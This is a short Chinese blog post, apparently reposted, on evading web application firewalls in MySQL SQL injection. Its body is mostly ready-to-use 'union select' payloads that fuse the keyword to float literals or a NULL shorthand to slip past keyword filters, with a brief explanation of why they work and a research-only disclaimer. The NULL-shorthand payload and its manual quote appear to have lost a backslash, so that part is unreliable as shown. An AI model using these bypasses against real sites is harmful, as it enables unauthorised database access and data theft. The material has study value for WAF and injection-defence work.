直接上语法
select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0select * from users where id=Nunion select 1,2,3,4,5,6,7,8,9,0因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。
另外根据官方文档我们可以看到N其实相当于NULL字符,利用这个特性可以绕过很多waf。
9.1.7 NULL Values
The NULL value means “no data.” NULL can be written in any lettercase. A synonym is N (case sensitive).
原文地址: http://www.codefrom.com/paper/通用的关于sql注入的绕过waf的技巧(利用mysql的特性)
本文始发于微信公众号(关注安全技术):通用的关于sql注入的绕过waf的技巧(利用mysql的特性)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论